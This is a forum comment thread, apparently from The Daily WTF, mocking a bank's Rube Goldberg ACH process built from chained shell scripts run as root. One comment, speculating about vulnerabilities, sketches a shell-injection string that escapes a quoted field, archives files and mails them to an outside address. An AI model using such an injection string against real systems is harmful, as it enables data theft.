• Derek (unregistered)

    Oh. Dear. God.

  • (cs)

    I almost got a heart attack while reading that... O_O

  • Shakes (unregistered) in reply to Derek

    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

  • Colin (unregistered)

    Now if I can find a bank that bounces money around in a similar fashion then I can stop laundering money.

  • awefawfeawfe (unregistered) in reply to Colin

    Bleh.  I've seen this lots with so-called Unix pros.  They just can't let go of Unix, and have to wedge shit like scripts into everything, even if they're not required.

  • (cs) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt


    I doubt it; a perl programmer would know how to format text without all the hurdles.  Sounds like a bunch of shell scripts. 

    I just can't fathom how someone can understand awk, sed, and stuff, and not understand basic programming concepts.  Someone please shoot the developer and put him out of our misery.
  • BlackTigerX (unregistered)

    very Unixy indeed

  • (cs)

    I can´t think of anything more powerfull than copy-pasting a batch file to a Hyper terminal connection...

    If only I had thought of that, before I spent so much time writing a semi-DTS middleware driven service to replicate data between my clients..


  • (cs)

    Two possibilities:

    1. Accretion: Day 1: "It has to do this." Day 3: "It has to do this, too." Day 8: "Can you add this?" ...

    2. Fear: "I know what I know, and can't/won't learn one iota more, even though that would save gobs of time and produce a safer & more maintainable product. (No one will ever need to update it, right?) And I'll make it work somehow."

  • Otto (unregistered)

    You can't shock me with stuff like that. I've got a set of scripts right here which uses grep, sed, awk, bash, ksh, perl, sql, and even ftp. It's like 3000 lines total and about 15 files, and the upshot of it is to build about 4000 files (based on info from the database) which then get ftp'd to 4000 different machines. It's fairly robust and works reasonably well, and the fact that I could totally rewrite it in one C program and about 400 lines of code is sorta beside the point, I feel. Some things you just have to admire for the sheer insanity of them. There's some quite elegant pieces of scripting action in this thing, for example, even if the whole of it is a WTF.

    Forum WTF: I can't seem to login.

  • Scott (unregistered) in reply to BlackTigerX

    Well,

    I'm a recent Computer Science grad, and they taught us Bash, Awk, Sed and Grep before they taught us OO. And A LOT of people dropped out in that semester. You would still have enough knowledge to pass yourself off as intelligent to a non-tech person.

    Oh, and that collection of scripts sounds terrifying.

  • (cs)

    I can sum up the story:  Developer mistakes bad design for fundamental tenet of philosophy X.  In this case, X = Unix.

    This WTF is just bad design, which we can all agree is platform agnostic.

  • Dave (unregistered) in reply to Otto

    The Real WTF is saying "I can't seem to log in..." when you just posted a message.

  • (cs) in reply to Chris F

    I'd need more history on this development to know where the blame lies.

    I could easily enough imagine a developer having the fear of God put into him over the serious nature of banking transactions and the importance of complete audit trails, so he wants to visually verify the results at each step of the operation, to audit and ensure correctness and completeness at every stage.  Rewriting each function once you've verified it kinda undermines the purpose of verification.  As (in general terms) does changing the execution path in any way to choose between verification and execution.

    The script could have dialled in to the bank and transferred the file automatically, but would you trust it to do so if you were the CFO?  What errors might go unnoticed?  And mailing it to oneself does have the side benefit of capturing a copy of the file in a separate system for any backup purposes, should anything go wrong with the transaction.

    Sure, it's a WTF.  But so are most systems that we rely on every day.

  • RJ (unregistered) in reply to Chris F

    Being the "RJ" in question above (and a longtime FreeBSD and Linux user), I had no intention of making fun of the Unix philosophy; rather "how much work some will do to imagine they are working in the Unix tradition:".

    But yes, the WTF was just bad design, combined with Unix newbie arrogance. As I recall, the guy who did the script actually spent 2 months preparing, reading up on the "theory" of EDI, etc...

    In fact, the above was only one example of design WTF that I found on arriving at that company. Among others:

    1. Test data commingled with production data in a single MySQL database (never mind that using MySQL for banking data is questionable in itself). In fact, I finally gave up on ever identifying which was which, and made a clean break with a new system in the end.

    2. Apparently the 4 previous developers had never heard of a JOIN in SQL. They would handle all join-type operations by looping through records in PHP and then issuing sub-queries for every row of the main result set. Occasionally the nesting would be 3 or 4 levels deep. This came to my attention which realizing that a 1000-member list of customers + status was taking 10 minutes to appear in the browser.

    3. Identically-named functions copied and pasted into different contexts, and subtly altered for that context.

    4. <b>Reverse</b> indentation. Yes, that's right... you would see a function name about 3 tabs in, and then the body of code stuck right on the margin.

    5. Phantom "else" clauses:

    if($check = 1){
        ...do something
    }
    else{
        ;
    }

    6. Code in about half of the PHP files had about 5 or 6 (or 7) spaces between lines. I guess someone wanted to inflate their LOC.

    7. umm... forget it. I'm too disgusted to even finish this list. Let's just say that by the end I had almost completely redesigned their system, as well as migrated to PostgreSQL, leaving the design standard enough to migrated to Oracle if needed.

  • (cs)

    That's worse than most configure scripts.

    # Is the header present?
    echo "$as_me:$LINENO: checking nl.h presence" >&5
    echo $ECHO_N "checking nl.h presence... $ECHO_C" >&6
    cat >conftest.$ac_ext <<_ACEOF
    /* confdefs.h.  */
    _ACEOF
    cat confdefs.h >>conftest.$ac_ext
    cat >>conftest.$ac_ext <<_ACEOF
    /* end confdefs.h.  */
    #include <nl.h>
    _ACEOF
    if { (eval echo "$as_me:$LINENO: \"$ac_cpp conftest.$ac_ext\"") >&5
      (eval $ac_cpp conftest.$ac_ext) 2>conftest.er1
      ac_status=$?
      grep -v '^ *+' conftest.er1 >conftest.err
      rm -f conftest.er1
      cat conftest.err >&5
      echo "$as_me:$LINENO: \$? = $ac_status" >&5
      (exit $ac_status); } >/dev/null; then
      if test -s conftest.err; then
        ac_cpp_err=$ac_c_preproc_warn_flag
        ac_cpp_err=$ac_cpp_err$ac_c_werror_flag
      else
        ac_cpp_err=
      fi
    else
      ac_cpp_err=yes
    fi
    </nl.h>

    At least this has an excuse: it's automatically generated.

  • (cs)
    Jake Vinson:

    After a few questions, I began to piece together how this thing actually worked: once a day the manager (a non-technical employee) would log into the main Linux server *as root*, cd to a directory inside /usr, run a certain shell script, and pipe the output to the Unix 'mail' utility to email it to his own desktop. From there, he would copy the text into Wordpad, make sure all formatting was correct, and then run that classic Windows dial-up console, Hyperterminal. He would dial the bank system, log in, and finally paste the ACH text from Wordpad into Hyperterminal to finalize the transactions.

    <FONT face=Georgia>I know the multiple scripting sounds terrible, but what about allowing the day manager, a non-techie, to log in as root? Wouldn't the manager have power to "inflate" his own account, and manipulate other sensitive data? WTF indeed.</FONT>

    >BiggBru

  • (cs)
    Jake Vinson:

    On thinking it through, this whole thing could be done with a 10 line script running 3 SQL queries. But that wouldn't be very Unix-ish, would it? Did I mention that the person who did this took weeks...?


    Don't forget to add enough Enterprise to it!
  • (cs) in reply to Coughptcha

    The next thing I'd do would be to find out whether any UNIX scripts are processing user input. I'm neither a security or UNIX expert (so excuse my psedo-UNIX) but I'd suspect that user input like:
    "'; tar * > insecure.tar; mail (options) insecure.tar [email protected]; (note the double quote to escape string delimitation)
    would make it to the shell via user input and as a bonus probably SQL injection code too if his input validation processes look anything like his SQL.

  • ParkinT (unregistered)

      Scripts that call other scripts ad infinitum...WHOA!!

  • ParkinT (unregistered) in reply to marvin_rabbit
    marvin_rabbit:
    Jake Vinson:

    On thinking it through, this whole thing could be done with a 10 line script running 3 SQL queries. But that wouldn't be very Unix-ish, would it? Did I mention that the person who did this took weeks...?


    Don't forget to add enough Enterprise to it!

    And pipe the output into XML !

  • He Sed Awk (unregistered) in reply to notromda

    I can ... worked for the guy.

    We had a document production system - long story but the print queue management was done via a shell script (the print queues were directorys in a linux file system - do not ask).

    Well, there were times where file collisions would cause pages to be missing from the document package built from this queue.  The shell script did no error handling and just allowed files to get clobbered.  This annoyed our customers to no end - they had to call in and complain, then the pages would be reproduced - you get the idea. 

    I checked into this, found the script and decided that this needed to be fixed.  An hour and a couple dozen lines of nice PERL code and the thing was running like a clock - never again missing pages.

    Manager was told and went nuts - claimed that PERL would be loaded dozens of time, bog down the system, was the wrong ... blah blah.  Even after ps logs showing things running smoothly and weeks of flawless production (we use to get at least one a day), he still was not convinced. 

    He wanted is written in SED and AWK.  I said that was entirely wrong.  Eventually he tossed the O'Reilly book "SED/AWL" on my desk and told me that he had no use for a developer who was not willing to learn.  I still have that book, he was fired as the tech manager, and all of the quality developers, myself included, no longer work there.

     

  • Valdas (unregistered)

    Yeah, this sounds quite f**ked up... Howerver, there ARE cases where you don't want SQL engine to do almost anything. I do remember one project that basically replaced a complex SQL query that was pulling ~80 MB of data from data warehouse, with a simple SQL dump, syncsort and a bunch of perl scripts to parse through the data. The end result was that an 8-hr process came down to 1-2 hrs.

  • Michael Langford (unregistered)

    Sounds like he just needed to use minicom then it would have worked without human intervention....I'm really going to have to disagree. This isn't a WTF. This is merely a process the company finally decided to do right they had only shakily automated before.

    Seriously, that would have been a great way to do some housekeeping functions of the business, but its an unforgivably poor descision to leave it as unmaintainable scripting when it was so important to the core business functions.

    Oh wait, they DID assign someone to redo this in a more maintiainable style. I mean, perhaps the time that the system was used was overlong, however this isn't a horrible process.

    Except for the mailing to the dude to paste into hyperterm, this is a fine way to do less important things. Comparing this method to manually doing it all, it's a great method.

    The point of business isn't to do things elegantly, its to do them cheaply*. This method did it in spades. It could have used a little more documentation, from what I can tell, but it sounds perfectly reasonable other than that for a v1 system. What he's calling rube goldberg is incredibly fast to develop, and just works well enough for basic systems.

                  --Michael


    *In the long run, Elegant=Cheap. Then again, apparently someone at this company (the person who assigned the submitter the task) understood this fact, and had him redo it.

  • (cs) in reply to jspenguin
    jspenguin:
    That's worse than most configure scripts.

    Oh yeah, GNU Autotools, our fun unholy union of Perl, bash, m4, Make, and the muck from the depths of RMS's deprave mind. The biggest threat when trying to extend any GNU program is accidentally opening "Makefile.in" when you meant to open "Makefile.am". =)

    (sigh we have scons, rake, and dozens of other things that are a bit easier to figure out. Heck, even Ant is more straightforward with its XML build files...)

  • password (unregistered)

    I bet the root password was probably something like 'cookies' too, right?

  • (cs) in reply to BlackTigerX
    Anonymous:
    very Unixy indeed


    Not at all, actually. What RJ did in the end, a 10-line script with 3 SQL queries, that was Unixy. See http://www.faqs.org/docs/artu/ (I love being able to insert links, at last. Oh and the new edit control is far more responsive than the old one).

  • anonymous (unregistered) in reply to RJ

    Anonymous:
    Being the "RJ" in question above (and a longtime FreeBSD and Linux user), I had no intention of making fun of the Unix philosophy; rather "how much work some will do to imagine they are working in the Unix tradition:".

     

    Yes, but you realize, this is the site where the stupid come to mock the ignorant (except on Wedensdays, when the ignorant mock the stupid), so, you had to know the post would be misinterpreted as an attack on Unix.

  • He Sed Awk (unregistered) in reply to He Sed Awk

    Oops I meant to quote :

    ... I just can't fathom how someone can understand awk, sed, and stuff, and not understand basic programming concepts.  Someone please shoot the developer and put him out of our misery ...

    I can ... worked for the guy.

    We had a document production system - long story but the print queue management was done via a shell script (the print queues were directorys in a linux file system - do not ask).

    Well, there were times where file collisions would cause pages to be missing from the document package built from this queue.  The shell script did no error handling and just allowed files to get clobbered.  This annoyed our customers to no end - they had to call in and complain, then the pages would be reproduced - you get the idea. 

    I checked into this, found the script and decided that this needed to be fixed.  An hour and a couple dozen lines of nice PERL code and the thing was running like a clock - never again missing pages.

    Manager was told and went nuts - claimed that PERL would be loaded dozens of time, bog down the system, was the wrong ... blah blah.  Even after ps logs showing things running smoothly and weeks of flawless production (we use to get at least one a day), he still was not convinced. 

    He wanted is written in SED and AWK.  I said that was entirely wrong.  Eventually he tossed the O'Reilly book "SED/AWL" on my desk and told me that he had no use for a developer who was not willing to learn.  I still have that book, he was fired as the tech manager, and all of the quality developers, myself included, no longer work there.

     

  • (cs) in reply to Michael Langford
    Anonymous:
    What he's calling rube goldberg is incredibly fast to develop, and just works well enough for basic systems.


    I think you are forgetting this sentence: "Apparently, this script had taken weeks to produce, and was the most revered "mission critical" piece of the system."

    *In the long run, Elegant=Cheap. Then again, apparently someone at this company (the person who assigned the submitter the task) understood this fact, and had him redo it.


    Exactly.  Have a look at <http://www.martinfowler.com/bliki/TechnicalDebt.html>.

    Sincerely,

    Gene Wirchenko

  • Kypeli (unregistered)

    I have this friend who says Unix-like systems are so great because they have small, well defined programs that do their job very efficiently and then you just use these programs together to accomplish what you want to do.

    I wonder if this is the perfect example to show how is should be done in the wonderful Unix way?

  • (cs) in reply to felix
    felix:
    Anonymous:
    very Unixy indeed


    Not at all, actually. What RJ did in the end, a 10-line script with 3 SQL queries, that was Unixy. See http://www.faqs.org/docs/artu/ (I love being able to insert links, at last. Oh and the new edit control is far more responsive than the old one).



    But where's the pizza?  Also, the edit box is still tetchy about moving the cursor to the last line when you click somewhere below the last line (Firefox 1.5.0.3)

  • eddiedatabaseboston (unregistered) in reply to RJ
    Anonymous:

    5. Phantom "else" clauses:

    if($check = 1){
        ...do something
    }
    else{
        ;
    }



    This could have been done for debugging, to allow a place to add a breakpoint.
  • Who Wants To Know? (unregistered)

    Hey, let us know WHICH company does this!  They are BREAKING US law DIRECTLY, and at least a lot of countries laws on fiduciary duty!  There shoul be NO need for checks, it should NOT be clear text, etc....

    As for how the guy did it before you?  ACH format is pretty well known NOW, but what about when it was written?  What limitations were put on him?  I, as MOST techies can say also, am VERY well aware of how a simple project that SHOULD take an hour can be drawn out into one taking MONTHS!  Not because of the system.  Perhaps not even because of the employees!   The corporate structure may greatly complicate things.  Were sysadmins, dbas, configuration management, etc... involved?  Was the UNIX system CRIPPLED in some way?  Did their manager WANT to review the stuff(AGAIN, that is ILLEGAL)

    UNIX was written in the late sixties.  The I.E.E.E. made a STANDARD of it in the 70s.  In the 80s, the entire computer industry was spun around when IBM did the UNTHINKABLE and said they were NOT THE source.  When all those companies wanted to sell to a now platform weary public, which O/S did they choose?  AIX?  SOLARIS?  HP/UX?  ULTRIX?  NPS?  MPRAS?  All of the above are made by different big companies that were around in the 80s.  ALL are variants of UNIX! 

    I guess there is SOMETHING to it!

    BTW have you dealt with outlook/xchange/activex/vb/access/odbc/etc.... yet?  Just the macros in ACCESS could drive you NUTS!  Let's not place ALL the blame on UNIX!

    Steve

  • (cs)

    Wow, and you wanted to change it?!?!?!!? WHY!?!?!?!?
    It's UNIX! You HAVE to use shell scripts, and stream processing utils in ANY unix program! It's UNIX for crying out loud! What would a script be withou using sed, cat, awk, and grep? I think it's complete genious, no wait, make that Brillance!

  • Chris (unregistered)

    I hope you're proud, Daily WTF people! Every time I read one of these I gain a new layer of fear to do anything on the net. Ahh, my ignorance was such sweet bliss...

  • Knobcheese (unregistered) in reply to Who Wants To Know?
    Anonymous:
    BTW have you dealt with outlook/xchange/activex/vb/access/odbc/etc.... yet?  Just the macros in ACCESS could drive you NUTS!  Let's not place ALL the blame on UNIX!


    I think YOUR caps lock KEY is BROKEN!
  • JoeBloggs (unregistered) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

    Can't be. If it was Perl, the submitter would be complaining about having to maintain 80 bytes of line noise.

  • (cs) in reply to JoeBloggs
    Anonymous:
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt
    Can't be. If it was Perl, the submitter would be complaining about having to maintain 80 bytes of line noise.
    And furthermore Perl has this handy thing called "DBI" to handle this advanced "database usage" thing, though that doesn't prevent people from open()ing a pipe to their sql command line client... *sigh*
  • (cs)

    The real WTF is that they didn't simply use a CRON job.

  • (cs) in reply to Bus Raker

    Bus Raker:
    The real WTF is that they didn't simply use a CRON job.

    I'm a little fuzzy on my corporate IT evolution...

    Punchcards > Unix Shell Scripts > Windows Batch Files > Unix Shell Scripts (Windows found to be not secure) > Windows VBS/Batch (thought to be secure) > Linux/Database  (Windows thought not to be secure) > Windows/XML Database (again thought to be secure) > ???

    Sounds like these scripts had evolved over the entire OS timeline.

  • (cs) in reply to Bus Raker
    Bus Raker:

    Bus Raker:
    The real WTF is that they didn't simply use a CRON job.

    I'm a little fuzzy on my corporate IT evolution...

    Punchcards > Unix Shell Scripts > Windows Batch Files > Unix Shell Scripts (Windows found to be not secure) > Windows VBS/Batch (thought to be secure) > Linux/Database  (Windows thought not to be secure) > Windows/XML Database (again thought to be secure) > ???

    Sounds like these scripts had evolved over the entire OS timeline.



    In Oracle, there is a mechanism similar to cron jobs, called DBMS_JOBS. Since stored procedures written in PL/SQL can write files, open network connections etc., probably the whole thingy could be made as a single stored procedure. Though this might get it to the TDWTF frontpage, too.
  • GrandmasterB (unregistered) in reply to Shakes

    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt

    Nah.  If it was Perl, the guy would have stuffed the entire thing into a single regex.

  • gordy (unregistered) in reply to Valdas

    I hope you meant to say ~80GB

  • Phill Kenoyer (unregistered)

    Finish off your 10 line script with expect to send the output to the bank, then setup cron to run it auto-magically. No more need for anyone to manually run it.

  • (cs) in reply to Shakes
    Anonymous:
    I bet those scripts were written in Perl by a guy wearing a penguin t-shirt


    I actually just got finished writing a big general ledger job in Perl, and I assure you that mine was a nice clean program without ever having reference to any unix shell scripts, and when it got done running, the transaction was safely in the bank, and the confirmation was filed in the database, and emailed to the people who cared.

    This sounds like the work of a bash junkie who doesn't understand coding. Perl is way too good at this sort of data manipulation to have ever needed as many extra steps as are described.
  • (cs)

    Sounds like this guy and the guy from  "Web 0.1"  posted last week need to get together.  They could have help each other.  I think it would have worked better if the non-technical employee had to print out the ACH text from Wordpad, place it on his desk, take a photo of it, scan the photo, then send it to the bank to finalize the transactions. Why not!!!

  • RJ (unregistered) in reply to Satanicpuppy

    No, Perl was not involved in that mess. It was just a collection of Bash scripts. And for an example of the scripting proficiency involved, (AFAIR) the author used the following sort of construct to figure out how far to pad the numbers:

    if AMOUNT >= 10
        then PADCHARS = 8
    else
    if AMOUNT >= 100
        then PADCHARS = 7
    else
    #etc... proceeding up to 1000000

  • kipthegreat (unregistered) in reply to BiggBru
    BiggBru:
    Jake Vinson:

    After a few questions, I began to piece together how this thing actually worked: once a day the manager (a non-technical employee) would log into the main Linux server *as root*, cd to a directory inside /usr, run a certain shell script, and pipe the output to the Unix 'mail' utility to email it to his own desktop. From there, he would copy the text into Wordpad, make sure all formatting was correct, and then run that classic Windows dial-up console, Hyperterminal. He would dial the bank system, log in, and finally paste the ACH text from Wordpad into Hyperterminal to finalize the transactions.

    <font face="Georgia">I know the multiple scripting sounds terrible, but what about allowing the day manager, a non-techie, to log in as root? Wouldn't the manager have power to "inflate" his own account, and manipulate other sensitive data? WTF indeed.</font>

    >BiggBru



    Nope, only a techie would know how to correctly modify the numbers.  That's my company hires illiterate homeless people to run lists of credit card numbers from the office to the bank downtown.  Anyone else would be tempted to misuse the data.
  • Tim (unregistered)

    While this doesn't sound like it is the case here, there is a reason you might have this many steps in a batch process.

    Think pipelining and checkpointing.  If any step fails, you don't have to start at the beginning.  It is also possible that some steps can be run in N parallel processes.

    It is much harder to scale a sql query that takes an hour to process on a single machine than it is to scale a chain of scripts even if the scripts take 2 hours to run on the same machine.

Leave a comment on “More Rube Goldberg design”

Log In or post as a guest

Replying to comment #73486:

« Return to Article